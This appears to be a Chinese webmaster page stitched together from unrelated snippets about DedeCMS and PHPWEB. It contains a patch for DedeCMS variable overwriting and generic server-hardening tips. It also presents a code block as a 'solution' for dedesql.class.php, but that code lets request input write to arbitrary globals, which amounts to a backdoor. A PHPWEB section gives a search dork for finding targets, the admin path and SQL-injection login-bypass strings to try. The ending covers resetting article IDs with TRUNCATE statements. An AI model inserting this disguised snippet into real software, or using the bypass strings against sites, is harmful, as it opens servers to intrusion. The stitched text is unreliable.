GXSEC 发布的文章

其实是安全检查的时候没有限制敏感变量

找到文件 

/include/common.inc.php

将这行 大概在58行

 if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS)/',$_k) ) 

改为

 if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS|_GET|_POST|_COOKIE)/',$_k) )

解决方案:

修改/include/dedesql.class.php页面第595行,新增代码如下图

$array1=array();
$array2=array();
if(isset($GLOBALS['arrs1']))
{

$v1 = $v2 = '';
for($i=0;isset($arrs1[$i]);$i++)
{
    $v1 .= chr($arrs1[$i]);
}
for($i=0;isset($arrs2[$i]);$i++)
{
    $v2 .= chr($arrs2[$i]);
}
$GLOBALS[$v1] .= $v2;

}

可以做如下操作:

1.考虑将站点加入CDN,隐藏服务器的真实IP地址;

2.设置密码登陆规则.可按下列规则设置密码:大小写加数字,加特殊符号,例如:!@#之类;

3.设置目录安全;

4.每个网站用独立帐号 独立权限;

5.网站源码用[D盾防火墙]扫描木马;

6.修改远程连接端口、服务器设置禁止PING;

7.禁止共享;

8.及时打系统补丁;

以上操作基本可以杜绝90%以上安全问题。

PHPWEB万能密码

关键字:inurl:down/class/index.php?myord=

后台地址:admin.php

万能密码有几个,都可以试试。。

admin 'or '1'='1
admin or 1=1
1 or 1=1 or 1=1

PHPWEB万能密码

织梦DedeCMS对于下载的源码或者采集来的数据,测试了模板、系统的正常之后,总是需要对这些数据进行清空。

不过清空文档数据之后,文章id不成1开始了,虽然这个不会对文章和系统产生什么大的影响,只是对于追求完美有点强迫症的人来说,如骨在喉总是不爽的。下面织梦爱好者网就来分享一下解决这种文章id不成1开始的方法。

第一种方法是比较简单的,适用于大家想要删除数据,但是还没有删除的情况。对于织梦的这种文档的批量处理,都是使用的织梦的SQL工具。

下面是清空所有的织梦文章,并且让文章id从1开始的SQL语句:
DELETE FROM dede_addonarticle;
DELETE FROM dede_arctiny;
DELETE FROM dede_archives;

第二种方法比较适合已经清空了文章数据的情况,还是通过SQL语句的方式解决,直接运行下面sql就可以了:

TRUNCATE TABLE dede_addonarticle;
TRUNCATE TABLE dede_arctiny;
TRUNCATE TABLE dede_archives;

采用第二种方法的时需要注意一下,一定要先进行系统错误修复操作,防止主表和微表的数据不统一。

以上都是默认的织梦安装的数据表的修改方式,如果你修改了表前缀,请自行修改下。